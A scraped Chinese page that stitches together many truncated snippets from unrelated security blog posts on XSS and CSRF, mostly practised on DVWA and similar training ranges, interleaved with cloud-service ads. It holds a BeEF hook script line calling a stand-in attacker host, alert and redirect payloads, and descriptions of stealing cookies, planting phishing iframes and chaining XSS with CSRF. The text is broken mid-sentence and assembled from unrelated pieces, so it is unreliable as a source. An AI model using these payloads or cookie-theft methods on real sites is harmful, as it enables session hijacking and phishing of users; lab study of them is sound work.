) XSS(Stored)(存储型跨站脚本) 需要注意的是,DVWA 1.9的代码分为四种安全级别:Low,Medium,High,Impossible。 根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。 DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。 DOM型XSS可能是存储型,也有可能是反射型。 (注:下面的实验都是在Firefox浏览器下进行的,感谢火狐没做XSS filter) 反射型XSS 下面对四种级别的代码进行分析。 存储型XSS 下面对四种级别的代码进行分析。 Low 服务器端核心代码 <? 可以看到,对输入并没有做XSS方面的过滤与检查,且存储在数据库中,因此这里存在明显的存储型XSS漏洞。
简介 这篇文章通过 dvwa 简单研究了三种类型的 xss,并且讲述了如何利用 xss 获取目标网站用户的 cookie。 dvwa反射型xss 测试环境 一台 win2003 虚拟机,ip 为 192.168.50.128,用wamp集成环境将dvwa搭在8080端口。 dvwa存储型xss 存储型xss的不同之处在于它可以将用户构造的有害输入直接存储起来,不需要攻击者构造链接诱使受害人点击触发,而是目标网站的用户只要访问插入恶意代码的网站就能触发,相比较反射型 简单的一个弹框,弹框可见我们的payload已经储存到了数据库,只要访问该页面的用户都会触发xss。 ? 下面我们编写payload偷取该网站下用户的cookie,构造payload。 dvwa DOM型XSS dom xss xss主要分为三种,前面通过了dvwa分别研究了反射型和存储型两种xss,这次写篇有关dom xss的文章,dom xss和前面的两种xss的区别主要是
一站式解决数据备份、共享、大数据处理、线上数据托管的云端存储服务,新用户享四重好礼
项目地址: https://github.com/c0ny1/upload-labs 靶机包含的漏洞类型分类: 0x03 XSS-LABS 针对 xss 漏洞的专项训练靶场,一共 20 关,涉及的知识点包括 Pikachu上的漏洞类型列表如下: Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files 项目地址: https://github.com/digininja/DVWA DVWA 共有十个模块,分别是: 1.Brute Force(暴力(破解)) 2.Command Injection(命令行注入 (Reflected)(反射型跨站脚本) 10.XSS(Stored)(存储型跨站脚本) 需要注意的是,DVWA 的代码分为四种安全级别:Low,Medium,High,Impossible。 0x07 DVWA 的衍生品 DVWA-WooYun DVWA-WooYun 是基于 wooyun 历史真实漏洞而设计的漏洞靶场, 项目地址: https://github.com/lxj616/DVWA-WooYun
Dvwa简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境 Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入) SQL Injection(Blind)(SQL盲注) XSS(Reflected )(反射型跨站脚本) XSS(Stored)(存储型跨站脚本) DVWA 1.9的代码分为四种安全级别:Low,Medium,High,Impossible。 Dvwa网站搭建 第一步下载phpstudy(https://www.xp.cn/wenda/401.html) 由于Dvwa是php网站,所以需要在php环境下运行。 第二步安装Dvwa(https://github.com/ethicalhack3r/DVWA) 下载完成Dvwa压缩包,将压缩包下的文件解压到phpstudy的WWW文件目录下,紧接着需要配置config
二、XSS的分类 XSS的三种类型 反射型XSS 存储型XSS DOM型XSS DVWA平台通关 三、XSS的利用 利用XSS盗取用户cookie 利用XSS进行网页挂马 配合CSRF攻击完成恶意请求 Part.2 XSS的分类 XSS的三种类型 XSS一共有三种类型,分别是反射型XSS、存储型XSS以及DOM型XSS。 (2)存储型XSS 存储型XSS又称为持久性XSS,会把恶意代码存储在服务器端,危害性极强。例如攻击者发表了一篇带有恶意js代码的文章,那么所有访问该文章的用户都会中招。 和前面举的例子一样,可以看出XSS产生的原因有两点: 用户能够控制显示点 对输入输出内容过滤不严 ? 存储型XSS 该页面是一个留言板 ? 如果在此处插入一个js恶意脚本,每次有人访问该页面,都会加载这个恶意脚本,这就是存储型XSS。 查看后端源代码: ?
Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入) SQL Injection(Blind)(SQL盲注)XSS(Reflected )(反射型跨站脚本) XSS(Stored)(存储型跨站脚本) 需要注意的是,DVWA 1.9的代码分为四种安全级别:Low,Medium,High,Impossible。 修改后别忘了保存。 不存在 这是到config文件夹下,点击组织-文件夹和搜索选项 ? 在查看选项卡中,将隐藏已知文件类型的扩展名取消勾选 ? 而后将config文件重命名为config.inc.php 这时重新访问就好了,进行创建 ? 创建成功,直接跳转到登陆界面 ?
Part.2 CSRF攻击过程还原 攻击流程还原 依然是我们非常好用的DVWA平台,安全级别为Low,选择CSRF页面。 ? 是一个给我们修改用户密码的页面,为什么存在CSRF漏洞呢? 结合存储型XSS进行攻击 方法三:结合存储型XSS进行攻击 我们也可以结合存储型XSS漏洞进行攻击,将CSRF代码写入XSS注入点中,如下: ? 不了解存储型XSS漏洞的小伙伴可以看看我之前写的文章哦~ 【XSS漏洞】通过XSS实现网页挂马 Part.4 如何防御CSRF攻击? 方法一:添加HTTP Referer字段验证 我们来看看DVWA平台上Medium等级是如何进行防护的,部分源码如下: ? 我们从DVWA首页,跳转到密码修改页面,并抓个包看看: ? 可以看到Referer字段被包含了Host字段的地址。
当用户输入用户名和密码后,包含有 URL 的 PHP 脚本将会和预定义变量 PHPAUTHUSER、PHPAUTHPW 和 AUTH_TYPE 一起被调用,这三个变量分别被设定为用户名,密码和认证类型。 Part.4 插入恶意js脚本 插入恶意js脚本 Web页面以DVWA平台 存储型XSS为例,我们来插入一个恶意JS代码,代码构造如下: ? 通过插入iframe标签,让用户访问XSS漏洞页面时,自动访问攻击者服务器上的钓鱼页面fish.php,出现登陆弹窗。 选择low安全等级,打开dvwa XSS(stored)页面 : ? 在Name栏、Message栏均存在存储型XSS,在Message中输入上面的恶意代码,并提交,会发现有输入长度限制: ? Part.5 模拟用户访问 攻击流程 现在我们使用靶机来模拟一次攻击行为,使用用户主机访问low安全等级的dvwa XSS(stored)页面,因为impossible安全等级不存在XSS漏洞。
Hello,各位小伙伴周六愉快 晃眼之间一周又快要过去了,时间是不等人 今天我们来看看怎么利用XSS窃取用户cookie吧。 Part.1 概述 实验概述 实验拓扑: ? XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网页中插入恶意脚本,一旦用户访问该网页,cookie就会自动地发送到攻击者的服务器中去。 Part.3 利用XSS盗取Cookie XSS利用 web页面以DVWA平台 存储型XSS为例,我们来插入一个恶意JS代码。 构造如下js代码: ? 选择low安全等级,打开dvwa XSS(stored)页面 : ? 在Name栏、Message栏均存在存储型XSS,在Message中输入上面的恶意代码,并提交,会发现有输入长度限制: ?
提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication 包含了SQL注入、XSS、盲注等常见的一些安全漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 File Upload(文件上传) 6.Insecure CAPTCHA (不安全的验证码) 7.SQL Injection(SQL注入) 8.SQL Injection(Blind)(SQL盲注) 9.XSS (Reflected)(反射型跨站脚本) 10.XSS(Stored)(存储型跨站脚本) 2.1 搭建方法 如果是在Windows上搭建DVWA,安装过程主要分为两步: phpstudy下载以及安装。 DVWA下载及配置。
Num8:Reflected Cross SiteScripting (反射跨站脚本(xss)) 漏洞详情:反射型跨站脚本是由于对于用户输入过滤不严导致的一次性的脚本,攻击输入 <script>alert (/xss/)</script> ? 程序将用户输入信息直接输出,未进行过滤导致反射型 xss 的产生 Num9:Stored Cross SiteScripting(存储跨站脚本) 漏洞详情:存储性跨站脚本是由于对于用户输入过滤不严导致数据存储在文件中的可多触发型的脚本攻击 ,危害性大于反射型 xss <script>alert(/xss/)</script> ? > 同样将数据插入到页面当中访问即可触发 xss 未弹窗原因同上,此时我们刷新页面即可再次触发 xss 代码审计: 程序将用户输入的数据插入到了数据库中,这期间未对用户输入字符进行过滤导致了存储型 xss
1.2 XSS漏洞原理 1.2.1 反射型 非持久型,常见的就是在URL中构造,将恶意链接发送给目标用户。当用户访问该链接时候,会向服务器发起一个GET请求来提交带有恶意代码的链接。 造成反弹型XSS 主要是GET类型 1.2.2 存储型 持久型,常见的就是在博客留言板、反馈投诉、论坛评论、将恶意代码和正文都存入服务器的数据库。每次访问都会触发恶意代码。 例如:<srcipt>alert(/xss/)</srcipt> 1.2.3 DOM型 DOM型是特殊的反射型XSS 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document ,但是还能利用 只能选择case后面的参数来提交,如果不是就按照默认English 构造语句,这里的##是URL的锚点,让浏览器判断这里终止,主要是让本地存储这个xss语句,发送到服务端进行验证的是 在mysql的utf8字符集中,一个字符由1~3个字节组成,对于大于3个字节的字符,mysql使用了utf8mb4的形式来存储。
前言 上一篇文章中介绍了XSS(跨站脚本攻击)简单原理与几种类型。接下来通过实例用几行代码实现cookie的盗取。 正文 这里测试用的工具是DVWA(可以本地搭建,前面文章有介绍),和phpstudy。首先登陆DVWA,选择low模式,点击submit按钮。如下图 ? 然后咱们点击XSS(Reflected),首先输入 弹窗代码 <script>alert('XSS')</script> 然后界面弹窗,说明存在XSS跨站漏洞,如下图 ? 二,自己搭建有xss漏洞的站点进行测试,这里推荐DVWA 三,构造获取cookie的代码,就是简单的接收参数,和保存文件。 五,查看保存的信息。
script src="http://BeEF_IP:3000/hook.js"></script> 4、反射型XSS )</script> 页面重定向: <script>location.href="http://www.baidu.com"</script> 手工XSS 5、存储型XSS (XSS stored) 存储型XSS(持久型XSS)即攻击者将带有XSS攻击的链接放在网页的某个页面,例如评论框等; 用户访问此XSS链接并执行,由于存储型XSS能够攻击所有访问此页面的用户,所以危害非常大。 等待肉鸡触发xSS代码并将cookie发送到Kali 4.Cookie利用 获取用户 cookie 在 kali 打开 apache 服务 systemctl start apache2 新建一个存放 - - 》非持久化 储存型 - - 》持久化 五、Web信息收集之搜索引擎 搜索引擎: Google Hacking(谷歌) Shodan Hacking(撒旦) Zoomeye Hacking(钟馗之眼
2.CSRF与XSS的区别 CSRF听起来像跨站脚本攻击(XSS),但与XSS不同。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 什么意思呢? 0x02 常见CSRF攻击类型 常见CSRF攻击类型有:GET型CSRF、POST型CSRF 下面使用必火团队的CSRF在线靶场进行验证。靶场地址 GET型 仅需要一个HTTP请求。 GET型的大,利用通常使用的是一个自动提交的表单。 0x05 DVWA靶场CSRF练习 首先,先登录DVWA,以在浏览器上保存Cookie信息。用户名:admin 密码:password 1、Low级 查看下源码(这里只写一些关键代码): <? 但是如果同时存在存储xss漏洞的话,可进行csrf利用。
> (这里只是简单说明一下逻辑,本站已有前辈详细分析过源码) 由于使用了不可猜测到的token,所以我们首先想到的思路,就是找一个XSS漏洞来配合,先通过XSS获得token之后修改密码。 > 这里已经分析确认了$name可被我们利用做XSS,这样就可以配合CSRF来重置用户密码了。 需要先说明一下DVWA的数据库设计,guestbook表的name字段类型为varchar(100),也就是说最多name只能写入100个字符,超过的字符会被数据库抛弃不存储。 BTW: 这里没有修改DVWA后端源码,以保证跟大家的代码一致。 可是老问题依然存在。 ? 设想如果管理员只登陆刷新一次留言板,这样的成功率并不能够然人满意,我又开始另想办法了。
开始吧, 错误类型:存储型XSS 最初,让我们假设目标域为 target.ai,漏洞披露程序的范围为*.target.ai。 /subbrute.py target.ai| httprobe > sub4.txt 收集所有子域后,让我们对唯一的子域进行排序并使用以下命令将它们存储在一个文件中: cat sub.txt sub1 易受攻击的 url 看起来像:app-main.v2 ** .ai 这个易受攻击的 URL 有 2 个问题: 安全配置错误(管理页面的可用注册选项) 影响:任何用户都可以创建账户并访问管理页面 存储型 我已清除浏览器中的 cookie 并在登录后不久登录该账户,结果我再次使用 XSS →存储型XSS 影响: 通常,当攻击者将恶意内容作为用户输入注入并存储在目标服务器上(例如名字和姓氏)时,就会发生存储型 转载信息 文章标题:存储型XSS 原文作者:@pullakarthik 原文链接:https://pullakarthik5.medium.com/stored-xss-8a17b088bb9a 如有侵权
来看看怎么利用吧~ 首先使用msfvenom生成一段python类型的shell代码: ? 查看生成的代码如下: ? Part.2 BeEF BeEF的利用 在前面我们讲过使用存储型XSS进行网页挂马: 【XSS漏洞】通过XSS实现网页挂马 这里我们也来试试这种操作。 公众号回复CVE-2018-4878,下载安装存在存储型XSS的Catfishcms(DVWA也可以) 该CMS评论区存在存储型XSS: ? 查看网页源代码,成功插入XSS: ? 但是kali并没有getshell: ? 是因为这种方法并不会执行flash脚本。 这里我们试试一款kali自带的工具beef-xss: ? 运行beef: ? //登录名和密码默认都是:beef 我们将hook.js页面插入到存储型XSS处: ?
http://pan.baidu.com/s/1o7VQPZk 密码:09qz 常见靶场 DVWA (Dam Vulnerable Web Application) DVWA是用PHP 包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 他包含了XSS、SQL注入、调试代码、CSRF、不安全的对象应用以及程序逻辑上面的一些问题。 Exploit KB 该程序包含了各种存在漏洞的WEB应用,可以测试各种SQL注入漏洞。 它包含了命令行注射、sessionid问题、文件包含、参数篡改、sql注入、xss、flash form反射性xss、弱口令扫描等。 命令注入, 代码注入, XML攻击, LDAP攻击, 文件上传 以及一些指纹识别技术 DVWA-WooYun(乌云靶场) DVWA-WooYun是一个基于DVWA的PHP+Mysql漏洞模拟练习环境
分析型数据库TDSQL-A是腾讯云自研的新一代分析型数据库,支持行列混合存储,提供高性能海量数据实时存储和高效复杂查询分析能力。适用GB~PB级数据OLAP处理能力。
扫码关注云+社区
领取腾讯云代金券